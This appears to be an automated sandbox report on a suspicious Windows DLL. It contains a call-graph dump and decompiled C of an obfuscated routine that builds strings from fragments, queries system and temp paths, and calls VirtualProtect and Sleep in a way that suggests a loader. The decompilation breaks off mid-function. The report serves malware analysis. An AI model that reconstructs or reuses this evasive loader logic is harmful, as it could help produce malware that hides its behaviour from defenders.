calls 26867 6e24f26d 26868 6e24f2ab 26867->26868 26869 6e24f27b std::_Locinfo::_W_Getmonths 26867->26869 26875 6e242281 20 API calls __dosmaperr 26868->26875 26869->26868 26871 6e24f296 RtlAllocateHeap 26869->26871 26874 6e249256 7 API calls 2 library calls 26869->26874 26871->26869 26872 6e24f2a9 26871->26872 26874->26869 26875->26872 27187 6e20766e 43 API calls 27292 6e210041 40 API calls _Mpunct 27189 6e208643 43 API calls _Ungetc 27295 6e20844a 77 API calls std::locale::_Locimp::_Makeushloc 27195 6e22424e 6 API calls ___vcrt_FlsSetValue 27196 6e21fa4c 20 API calls ___scrt_release_startup_lock 26775 6e220052 26776 6e220060 dllmain_dispatch 26775->26776 26777 6e22005b 26775->26777 26779 6e220a3d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 26777->26779 26779->26776 27298 6e21fca2 29 API calls _at_quick_exit 27200 6e1e1a9a 22 API calls ctype 27205 6e1e1e8e 28 API calls std::ios_base::_Init 27207 6e207281 27 API calls std::bad_exception::bad_exception 27305 6e220483 5 API calls ___raise_securityfailure 26854 6e21fe86 103 API calls 4 library calls 27212 6e20d693 47 API calls __Tolower 27308 6e208499 81 API calls 2 library calls 27214 6e20dae0 22 API calls std::_Stofx_v2 27311 6e20d0e1 84 API calls 2 library calls 27312 6e2080ec 42 API calls std::ios_base::_Init 27221 6e20daf7 DecodePointer 27314 6e2098fd TlsFree 27315 6e2208c1 GetStartupInfoW ___scrt_fastfail 27317 6e2098d3 TlsAlloc 27222 6e209322 InitializeCriticalSectionAndSpinCount ___crtInitializeCriticalSectionEx 27323 6e209927 TlsGetValue 26855 6e21fd29 26856 6e21fd34 26855->26856 26857 6e21fd67 dllmain_crt_process_detach 26855->26857 26858 6e21fd59 dllmain_crt_process_attach 26856->26858 26859 6e21fd39 26856->26859 26864 6e21fd43 26857->26864 26858->26864 26860 6e21fd4f 26859->26860 26861 6e21fd3e 26859->26861 26866 6e21fa20 29 API calls 26860->26866 26861->26864 26865 6e21fa3f 27 API calls 26861->26865 26865->26864 26866->26864 27324 6e20852d 67 API calls 2 library calls 27223 6e20872e 65 API calls fpos 27227 6e20e73d 40 API calls 4 library calls 27230 6e20e705 39 API calls 4 library calls 27231 6e20670c EnterCriticalSection std::_Lockit::_Lockit 27232 6e21b70c 45 API calls 5 library calls 27234 6e21b715 43 API calls 4 library calls 27235 6e209314 DeleteCriticalSection 26876 6e21ff18 26878 6e21ff24 ___unDNameEx 26876->26878 26877 6e21ff33 26878->26877 26879 6e21ff4d dllmain_raw 26878->26879 26880 6e21ff48 26878->26880 26879->26877 26881 6e21ff67 dllmain_crt_dispatch 26879->26881 26889 6e201285 26880->26889 26881->26877 26881->26880 26883 6e21ff88 26884 6e21ffb4 26883->26884 26887 6e201285 83 API calls 26883->26887 26884->26877 26885 6e21ffbd dllmain_crt_dispatch 26884->26885 26885->26877 26886 6e21ffd0 dllmain_raw 26885->26886 26886->26877 26888 6e21ffa0 dllmain_crt_dispatch dllmain_raw 26887->26888 26888->26884 26890 6e201291 __EH_prolog3 __Stoullx 26889->26890 26891 6e2013aa GetSystemDirectoryA 26890->26891 26892 6e201401 __Stoullx 26891->26892 26893 6e201459 GetTempPathA 26892->26893 26894 6e20147c 26893->26894 26924 6e205dab 26894->26924 26900 6e2014f7 26954 6e204267 26900->26954 26902 6e20159b 26962 6e2020d9 26902->26962 26904 6e2015a2 26972 6e201ff2 26904->26972 26906 6e2015a9 26982 6e204401 26906->26982 26908 6e2015b5 26909 6e204401 79 API calls 26908->26909 26910 6e2015c1 26909->26910 26911 6e204197 28 API calls 26910->26911 26912 6e20168f 26911->26912 26913 6e201e10 28 API calls 26912->26913 26914 6e20169a 26913->26914 26915 6e205dab 28 API calls 26914->26915 26916 6e2016c8 26915->26916 26917 6e204197 28 API calls 26916->26917 26918 6e2016d9 26917->26918 26919 6e201e10 28 API calls 26918->26919 26920 6e2016e4 __Stoullx 26919->26920 26921 6e201a2e 26920->26921 26992 6e1ffb4a VirtualProtect Sleep 26921->26992 26923 6e201a4b moneypunct 26923->26883 26993 6e206062 26924->26993 26926 6e2014dd 26927 6e204197 26926->26927 26928 6e2041a3 __EH_prolog3_GS 26927->26928 26931 6e2041c0 26928->26931 27017 6e203751 28 API calls 4 library calls 26928->27017 26930 6e2041d9 26932 6e201f9a std::ios_base::_Init 28 API calls 26930->26932 26931->26930 26934 6e20420f 26931->26934 26933 6e2041e2 26932->26933 27018 6e205c7e 28 API calls 26933->27018 26936 6e201f9a std::ios_base::_Init 28 API calls 26934->26936 26938 6e20421d 26936->26938 26937 6e2041f9 27019 6e202b76 26 API calls _Deallocate 26937->27019 27021 6e2040e5 28 API calls collate 26938->27021 26941 6e204201 27020 6e22008a 5 API calls _ValidateLocalCookies 26941->27020 26942 6e20422d 27022 6e200bc1 28 API calls 4 library calls 26942->27022 26946 6e20423a 27023 6e223d74 RaiseException 26946->27023 26948 6e20424a 26949 6e205dab 28 API calls 26948->26949 26950 6e2014ec 26949->26950 26951 6e201e10 26950->26951 27024 6e201dfa 26951->27024 26956 6e204273 _wcslen __EH_prolog3_catch 26954->26956 27078 6e20220b 26956->27078 26960 6e2043f8 moneypunct 26960->26902 26961 6e2042d3 27082 6e203a25 26961->27082 26963 6e2020e5 __EH_prolog3_catch 26962->26963 26964 6e20220b 42 API calls 26963->26964 26965 6e2020f8 26964->26965 26966 6e20212a std::ios_base::_Ios_base_dtor 26965->26966 27103 6e2046ab 77 API calls 8 library calls 26965->27103 26967 6e203a25 42 API calls 26966->26967 26968 6e2021ab 26967->26968 26970 6e2021c1 42 API calls 26968->26970 26971 6e2021b3 moneypunct 26970->26971 26971->26904 26973 6e201ffe __EH_prolog3_catch 26972->26973 26974 6e20220b 42 API calls 26973->26974 26975 6e202011 26974->26975 26976 6e202043 std::ios_base::_Ios_base_dtor 26975->26976 27104 6e2046ab 77 API calls 8 library calls 26975->27104 26977 6e203a25 42 API calls 26976->26977 26978 6e2020c7 26977->26978 26980 6e2021c1 42 API calls 26978->26980 26981 6e2020cf moneypunct 26980->26981 26981->26906 26983 6e20440d __EH_prolog3_catch _strlen 26982->26983 26984 6e20220b 42 API calls 26983->26984 26985 6e204474 26984->26985 26991 6e20447d std::ios_base::_Ios_base_dtor 26985->26991 27105 6e204a80 77 API calls 8 library calls 26985->27105 26986 6e203a25 42 API calls 26987 6e20461a 26986->26987 26989 6e2021c1 42 API calls 26987->26989 26990 6e204622 moneypunct 26989->26990 26990->26908 26991->26986 26992->26923 26994 6e20606e __EH_prolog3 26993->26994 26999 6e204a32 26994->26999 26996 6e206077 27007 6e201f9a 26996->27007 26998 6e20608f moneypunct 26998->26926 27000 6e204a45 26999->27000 27001 6e204a3d 26999->27001 27003 6e204a51 27000->27003 27004 6e21f8b6 moneypunct 22 API calls 27000->27004 27011 6e205940 28 API calls 3 library calls 27001->27011 27003->26996 27006 6e204a4f 27004->27006 27005 6e204a43 27005->26996 27006->26996 27008 6e201fb4 _strlen 27007->27008 27012 6e202c1c 27008->27012 27010 6e201fc1 27010->26998 27011->27005 27013 6e202c4f 27012->27013 27015 6e202c2b BuildCatchObjectHelperInternal 27012->27015 27016 6e2048ac 28 API calls 5 library calls 27013->27016 27015->27010 27016->27015 27017->26931 27018->26937 27019->26941 27021->26942 27022->26946 27023->26948 27027 6e2028d1 27024->27027 27028 6e202911 27027->27028 27029 6e20293c 27027->27029 27064 6e20385a 28 API calls std::_Winerror_message 27028->27064 27031 6e202a38 27029->27031 27066 6e20385a 28 API calls std::_Winerror_message 27029->27066 27033 6e202a73 27031->27033 27034 6e202a43 27031->27034 27074 6e205025 28 API calls _Deallocate 27033->27074 27036 6e202a68 27034->27036 27037 6e202a48 27034->27037 27035 6e202924 27065 6e2047e8 28 API calls 27035->27065 27042 6e203ba9 28 API calls 27036->27042 27040 6e202a5d 27037->27040 27041 6e202a4d 27037->27041 27073 6e202b76 26 API calls _Deallocate 27040->27073 27044 6e202a83 27041->27044 27072 6e2052f2 26 API calls _Deallocate 27041->27072 27043 6e202a59 27042->27043 27075 6e204a54 26 API calls 2 library calls 27043->27075 27058 6e203ba9 27044->27058 27050 6e202952 27057 6e202937 27050->27057 27067 6e203885 28 API calls std::_Winerror_message 27050->27067 27052 6e201dfa 28 API calls 27052->27057 27057->27031 27057->27052 27068 6e2047e8 28 API calls 27057->27068 27069 6e203bd9 28 API calls 27057->27069 27070 6e203885 28 API calls std::_Winerror_message 27057->27070 27071 6e2036e8 28 API calls 27057->27071 27059 6e203bb1 27058->27059 27060 6e201e0c 27058->27060 27076 6e203bd9 28 API calls 27059->27076 27060->26900 27062 6e203bbb 27077 6e204a54 26 API calls 2 library calls 27062->27077 27064->27035 27065->27057 27066->27050 27067->27050 27068->27057 27069->27057 27070->27057 27071->27057 27072->27043 27073->27043 27074->27043 27075->27044 27076->27062 27077->27060 27079 6e202217 __EH_prolog3 27078->27079 27080 6e202248 moneypunct 27079->27080 27089 6e203968 42 API calls 2 library calls 27079->27089 27080->26961 27090 6e1e1eea 27082->27090 27084 6e203a3f 27085 6e2021c1 27084->27085 27086 6e2021eb 27085->27086 27087 6e2021f6 27086->27087 27102 6e2039cd 42 API calls 2 library calls 27086->27102 27087->26960 27089->27080 27091 6e1e1f45 27090->27091 27092 6e1e1f01 27090->27092 27091->27084 27093 6e1e1f3a 27092->27093 27099 6e1e1ca2 40 API calls std::ios_base::_Init 27092->27099 27101 6e223d74 RaiseException 27093->27101 27095 6e1e1f53 27095->27084 27097 6e1e1f2e 27100 6e1e1ebd 28 API calls std::ios_base::_Init 27097->27100 27099->27097 27100->27093 27101->27095 27102->27087 27103->26966 27104->26976 27105->26991 27237 6e1e1b25 21 API calls 2 library calls 27332 6e203d1c 26 API calls std::_Winerror_message 27238 6e220f1c 48 API calls 2 library calls 27240 6e25df65 41 API calls 4 library calls 27241 6e223f60 6 API calls 3 library calls 27337 6e206d6b 21 API calls _Yarn 27244 6e206770 LeaveCriticalSection LeaveCriticalSection std::_Lockit::_Lockit_ctor 27338 6e224173 54 API calls 2 library calls 27245 6e217b76 81 API calls 3 library calls 27106 6e21fd7c 27107 6e21fd88 ___unDNameEx 27106->27107 27124 6e21fab0 27107->27124 27109 6e21fd94 ___scrt_is_nonwritable_in_current_image 27110 6e21fd8f 27110->27109 27111 6e21fdb9 27110->27111 27112 6e21fe7e 27110->27112 27135 6e21fa12 27111->27135 27151 6e2207a7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 27112->27151 27115 6e21fe85 27116 6e21fdc8 __RTC_Initialize 27116->27109 27138 6e220a88 InitializeSListHead 27116->27138 27118 6e21fdd6 ___scrt_initialize_default_local_stdio_options 27139 6e24aac1 27118->27139 27122 6e21fdf5 27122->27109 27147 6e24aa65 27122->27147 27125 6e21fab9 27124->27125 27152 6e220604 IsProcessorFeaturePresent 27125->27152 27127 6e21fac5 27153 6e223ead 10 API calls 3 library calls 27127->27153 27129 6e21faca 27130 6e21face 27129->27130 27154 6e24aa1c 27129->27154 27130->27110 27133 6e21fae5 27133->27110 27170 6e21fae9 27135->27170 27137 6e21fa19 27137->27116 27138->27118 27141 6e24aad8 27139->27141 27140 6e21f8a5 _ValidateLocalCookies 5 API calls 27142 6e21fdea 27140->27142 27141->27140 27142->27109 27143 6e21f9e7 27142->27143 27144 6e21f9ec ___scrt_release_startup_lock 27143->27144 27146 6e21f9f5 27144->27146 27177 6e220604 IsProcessorFeaturePresent 27144->27177 27146->27122 27148 6e24aa94 27147->27148 27149 6e21f8a5 _ValidateLocalCookies 5 API calls 27148->27149 27150 6e24aabd 27149->27150 27150->27109 27151->27115 27152->27127 27153->27129 27158 6e25aca1 27154->27158 27157 6e223eec 8 API calls 3 library calls 27157->27130 27161 6e25acba 27158->27161 27160 6e21fad7 27160->27133 27160->27157 27162 6e21f8a5 27161->27162 27163 6e21f8b0 IsProcessorFeaturePresent 27162->27163 27164 6e21f8ae 27162->27164 27166 6e2202c4 27163->27166 27164->27160 27169 6e220288 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27166->27169 27168 6e2203a7 27168->27160 27169->27168 27171 6e21faf8 27170->27171 27172 6e21fafc 27170->27172 27171->27137 27175 6e21fb09 ___scrt_release_startup_lock 27172->27175 27176 6e2207a7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 27172->27176 27174 6e21fb8d 27175->27137 27176->27174 27177->27146 27246 6e208f40 30 API calls 2 library calls 27342 6e1e157a 39 API calls __Getctype 27346 6e209951 TlsSetValue 27249 6e206759 LeaveCriticalSection std::_Lockit::_Lockit_ctor 27348 6e1e159d 38 API calls __Getcvt 27252 6e206faa 4 API calls 2 library calls 27349 6e2179ab 82 API calls 27353 6e220daf 51 API calls 2 library calls 27356 6e213db9 46 API calls 2 library calls 27253 6e209783 CreateEventW 27358 6e20a597 89 API calls std::locale::_Locimp::_Locimp_Addfac 27360 6e25e19f 44 API calls 4 library calls 27256 6e206b9d 29 API calls 3 library calls 27261 6e25e3ef 42 API calls 4 library calls 27361 6e20c9ec 79 API calls 3 library calls 27264 6e20fff3 42 API calls _Mpunct 27363 6e2071fa 44 API calls std::locale::_Init 27265 6e219ffa GetStringTypeW __Getwctypes 27364 6e2171c4 56 API calls std::locale::_Locimp::_Makeushloc

                          Executed Functions

                          Function 6E201285, Relevance: 39.1, APIs: 3, Strings: 19, Instructions: 597COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 6e201285-6e2012cb call 6e2200ac 3 6e201316-6e201328 0->3 4 6e2012cd 0->4 5 6e20132b-6e20132e 3->5 6 6e2012d3-6e201310 4->6 7 6e2012cf-6e2012d1 4->7 8 6e201330-6e201361 call 6e2201e0 5->8 9 6e201366-6e201371 5->9 6->3 7->3 7->6 11 6e201373-6e20137e 8->11 15 6e201363 8->15 9->5 9->11 13 6e201390-6e2013a4 11->13 14 6e201380-6e201386 11->14 17 6e2013aa-6e2013fb GetSystemDirectoryA 13->17 14->13 16 6e201388-6e20138e 14->16 15->9 16->17 18 6e201401-6e201403 17->18 19 6e201405-6e20143a call 6e2201e0 18->19 20 6e201449-6e201452 18->20 21 6e201454-6e20147a call 6e200d32 GetTempPathA 19->21 25 6e20143c-6e201442 19->25 20->18 20->21 27 6e2014b1 21->27 28 6e20147c-6e2014af 21->28 25->20 29 6e2014b7-6e201501 call 6e200d32 call 6e205dab call 6e204197 call 6e201e10 27->29 28->29 38 6e201503-6e20151a 29->38 39 6e20151c-6e20152c 29->39 40 6e201531-6e201558 call 6e24179f 38->40 39->40 43 6e201578-6e20158d 40->43 44 6e20155a-6e201576 40->44 45 6e201593-6e2015d2 call 6e204267 call 6e2020d9 call 6e201ff2 call 6e204401 * 2 43->45 44->45 56 6e2015d8-6e2015e1 45->56 57 6e2015e3-6e2015fa 56->57 58 6e2015fc-6e201605 56->58 57->58 58->56 59 6e201607-6e201618 call 6e24179f 58->59 61 6e20161d-6e201629 59->61 62 6e201644-6e201654 61->62 63 6e20162b-6e201631 61->63 65 6e20165a-6e201735 call 6e204197 call 6e201e10 call 6e200ef6 call 6e205dab call 6e204197 call 6e201e10 62->65 63->62 64 6e201633-6e201642 63->64 64->65 78 6e201737-6e20173e 65->78 79 6e201740-6e201746 78->79 80 6e201748-6e201763 78->80 79->80 81 6e20176d-6e201776 79->81 80->81 82 6e201765-6e20176b 80->82 81->78 83 6e201778-6e2017cc call 6e200d32 81->83 82->81 82->83 86 6e2017e9-6e2017f8 83->86 87 6e2017ce-6e2017e7 83->87 88 6e2017fb-6e20180c 86->88 87->88 89 6e20180f-6e201812 88->89 90 6e201814-6e201840 call 6e2201e0 89->90 91 6e201878-6e20187b 89->91 95 6e201852-6e201861 90->95 96 6e201842 90->96 93 6e201845-6e201850 91->93 93->89 93->95 97 6e201863-6e20186b 95->97 98 6e20187d-6e20188e 95->98 96->93 97->98 99 6e20186d-6e201876 97->99 100 6e201891-6e201897 98->100 99->100 101 6e2018b1 100->101 102 6e201899-6e2018af 100->102 103 6e2018b4-6e2018d2 101->103 102->103 104 6e2018d8-6e2018e1 103->104 105 6e2018e3-6e201906 104->105 106 6e20190c-6e20191a 104->106 105->106 106->104 107 6e20191c-6e20192e 106->107 108 6e201931-6e201935 107->108 109 6e201961-6e20196c 108->109 110 6e201937-6e201955 108->110 109->108 112 6e20196e-6e201993 call 6e201029 109->112 111 6e201957-6e20195a 110->111 110->112 111->109 115 6e2019a1-6e2019b8 112->115 116 6e201995-6e20199f 112->116 117 6e2019ba-6e2019e9 115->117 118 6e2019eb 115->118 116->115 119 6e2019ee 117->119 118->119 120 6e2019f3-6e2019fc 119->120 121 6e201a0c-6e201a17 120->121 122 6e2019fe-6e201a0a 120->122 121->120 123 6e201a19-6e201a2c 121->123 122->121 124 6e201a39-6e201a56 call 6e1ffb4a 123->124 125 6e201a2e-6e201a33 123->125 128 6e201a5c-6e201a64 124->128 125->124 129 6e201a66-6e201a6c 128->129 130 6e201a6e-6e201a8b 128->130 129->130 131 6e201a91-6e201a9a 129->131 130->131 131->128 132 6e201a9c-6e201aa5 131->132 133 6e201ae5-6e201b07 call 6e220075 132->133 134 6e201aa7 132->134 135 6e201aa9-6e201aab 134->135 136 6e201aad-6e201adf 134->136 135->133 135->136 136->133
                          C-Code - Quality: 73%
                          			E6E201285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E2200AC(0x6e267e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e2c5a90; // 0x280609b9
				_t127 =  *0x6e2c59d0; // 0xd1fe2dea
				_t261 =  *0x6e2c59d8; // 0x1eb1fcd4
				_t380 =  *0x6e2c59dc; // 0x6
				_t358 =  *0x6e2c5a00; // 0x1999d5d1
				_t405 = 0 - _t380;
				_t327 =  *0x6e2c5a90; // 0x280609b9
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e2c5a58 =  *0x6e2c5a58 + 0xfffffd1c;
					 *0x6e2c5a00 = _t358;
					asm("adc dword [0x6e2c5a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2c59d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2c59dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2c59e6 & 0x0000ffff;
				_t131 = 0x6e2c59e6;
				 *(_t400 - 0x2c) = 0x6e2c59e6;
				 *(_t400 - 0x1c) = 0x6e2c59e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E2201E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2c59d8 = _t261;
						 *0x6e2c59dc = _t380;
						 *0x6e2c5a90 = _t327;
						if(_t327 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e2c5a44);
				_t135 = 6;
				_t411 =  *0x6e2c5a98 - _t135; // 0x6e26e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2c59d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2c59dc = _t380;
				} else {
					_t412 =  *0x6e2c5a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2c59d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e2c5a00; // 0x1999d5d1
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2c59e6;
				 *0x6e2c5a90 = _t139 -  *0x6e2c5a90 +  *0x6e2c59d0;
				_t142 =  *0x6e2c59e6 & 0x0000ffff;
				 *0x6e2c59d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2c59dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E2201E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2c59d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2c59dc = _t256;
						 *0x6e2c5a90 = _t381;
						if(_t381 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t381 =  *0x6e2c5a00; // 0x1999d5d1
							_t142 =  *0x6e2c59e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e2c5a44);
				 *0x6e2c59d0 = E6E200D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e2c5a04 - 0x1b47; // 0x0
				if(_t417 == 0) {
					_t318 =  *0x6e2c5a90; // 0x280609b9
					_t319 = _t318 + ( *0x6e2c59e6 & 0x0000ffff);
					 *0x6e2c5a90 = _t319;
					_push(0);
					_t320 =  *0x6e2c59d8; // 0x1eb1fcd4
					asm("adc [0x6e2c59dc], eax");
					 *0x6e2c59d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E200D32();
				_t402 = _t401 - 0x10;
				 *0x6e2c59d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E205DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E204197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e2c5a02 - _t270; // 0x1999
				if(_t418 == 0) {
					_t151 =  *0x6e2c59d8; // 0x1eb1fcd4
					_t153 = _t151 + 0x11dde +  *0x6e2c59d0;
					__eflags = _t153;
					 *0x6e2c5a90 = _t153;
				} else {
					_t315 =  *0x6e2c59d8; // 0x1eb1fcd4
					 *0x6e2c59d0 =  *0x6e2c59d0 +  ~_t315 -  *0x6e2c5a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E24179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2c59d0; // 0xd1fe2dea
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0xd1fe2ab2
				_t272 = _t25;
				 *0x6e2c5a90 = _t272;
				_t419 =  *0x6e2c5a02 - _t155; // 0x1999
				if(_t419 == 0) {
					_t331 =  *0x6e2c5a00; // 0x1999d5d1
					_t156 = 0;
					 *0x6e2c59dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2c59d8 = _t333;
				} else {
					_t333 =  *0x6e2c59d8; // 0x1eb1fcd4
					_t156 =  *0x6e2c59dc; // 0x6
					 *0x6e2c5a90 = _t272 - _t333 * 0x3d -  *0x6e2c5a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E204401(_t260, E6E204401(_t260, E6E201FF2(_t260, E6E2020D9(_t260, E6E204267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e2c8150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e2c5a00; // 0x1999d5d1
				_t277 = 0x6e2c5a0e;
				_t362 =  *0x6e2c59dc; // 0x6
				_t383 =  *0x6e2c59d8; // 0x1eb1fcd4
				do {
					if(_t336 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x1999d5d6
						_t245 = _t26 + _t383;
						 *0x6e2c5a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2c59e2);
				_push("cd Matter m");
				 *0x6e2c59d8 = _t383;
				 *0x6e2c59dc = _t362; // executed
				E6E24179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e2c5a98 - _t164; // 0x6e26e664
				if(_t422 != 0) {
					L34:
					 *0x6e2c59d8 =  *0x6e2c59d8 - 0x27 +  *0x6e2c59d0 * 0x3d;
					asm("sbb [0x6e2c59dc], ecx");
				} else {
					_t423 =  *0x6e2c5a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2c59d8; // 0x1eb1fcd4
						 *0x6e2c59d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e2c5a90 =  *0x6e2c5a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E204197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t169);
				_t281 = 0x27;
				_t171 = E6E200EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2c59d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2c59dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E205DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E204197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t174);
				_t176 =  *0x6e2c59dc; // 0x6
				 *(_t400 - 0x18) =  *0x6e2c59d8 * 0x36 +  *0x6e2c5a90;
				_t286 =  *0x6e2c5a90 * 0x10e1d;
				_t178 =  *0x6e2c59d8; // 0x1eb1fcd4
				_t287 = 0x6e2c5a28;
				 *0x6e2c59d8 = _t178 * _t286;
				_t340 =  *0x6e2c5a90; // 0x280609b9
				_t180 =  *0x6e2c59d0; // 0xd1fe2dea
				 *0x6e2c59dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e2c5a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2c59dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2c59d8 = _t184;
						_t427 = _t184 -  *0x6e2c5a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e2c5a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
